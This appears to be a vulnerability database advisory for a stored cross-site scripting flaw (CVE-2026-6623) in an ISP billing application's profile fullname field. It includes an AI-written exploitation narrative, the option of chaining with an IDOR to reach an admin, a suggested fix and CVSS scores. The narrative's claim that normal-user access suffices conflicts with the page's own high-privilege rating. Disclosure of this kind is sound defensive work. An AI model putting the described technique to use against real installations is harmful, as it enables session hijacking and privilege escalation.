Low severity2.4NVD Advisory· Published Apr 20, 2026· Updated Apr 22, 2026

CVE-2026-6623

Description

A security flaw has been discovered in BichitroGan ISP Billing Software 2025.3.20. This impacts an unknown function of the file /?_route=settings/users-view/ of the component Profile Page Handler. Performing a manipulation results in cross site scripting. The attack is possible to be carried out remotely. The vendor was contacted early about this disclosure but did not respond in any way.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Stored XSS in BichitroGan ISP Billing Software 2025.3.20 via fullname field allows attackers to execute arbitrary JavaScript in admin sessions, potentially leading to full system compromise.

Vulnerability

Overview

CVE-2026-6623 is a stored cross-site scripting (XSS) vulnerability in BichitroGan ISP Billing Software version 2025.3.20. The flaw resides in the profile page handler, specifically the fullname parameter processed by the endpoint /accounts/profile (edit-profile-post) and rendered in /?_route=settings/users-view/{id}. User-supplied input is stored in the database and later displayed without proper output encoding, allowing injection of arbitrary JavaScript [1].

Exploitation

An attacker must first authenticate as a normal user. By navigating to the profile edit page and setting the fullname field to a malicious payload (e.g., ``), the script is stored. When any user—including an administrator—views the affected profile page or the admin user list, the payload executes in their browser. No special network position is required beyond remote access to the application [1].

Impact

Successful exploitation enables session hijacking, credential theft, and unauthorized actions within the context of the victim's session. The reference notes that this XSS can be chained with an IDOR vulnerability (CVE-2026-5031) to force an admin to view the attacker's profile, leading to privilege escalation and potential full system compromise [1].

Mitigation

The vendor was contacted but did not respond, and no official patch has been released. As a workaround, administrators should escape output using htmlspecialchars($user['fullname'], ENT_QUOTES, 'UTF-8') and validate input to restrict special characters. Implementing output encoding in all templates is also recommended [1].

References

CVE-2026-6623

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

News mentions

No linked articles in our index yet.

Severity

LowCVSS v3.1

2.4/ 10

CVSS v44.8

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack vector: Network
Complexity: Low
Privileges: High
User interaction: Required
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

EPSS

Probability of exploitation in the next 30 days.

0.03%

VYPR risk score

Composite of severity, exploitation, and reach.

0.16low

cvss	0.156
epss	0.000
exploit	0.000
kev	0.000
patch	0.000
ransomware	0.000

Weaknesses

CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-94
Improper Control of Generation of Code ('Code Injection')

CVE ID

CVE-2026-6623

Credits

4(
4m3rr0r (VulDB User)
reporter
VC
VulDB CNA Team
coordinator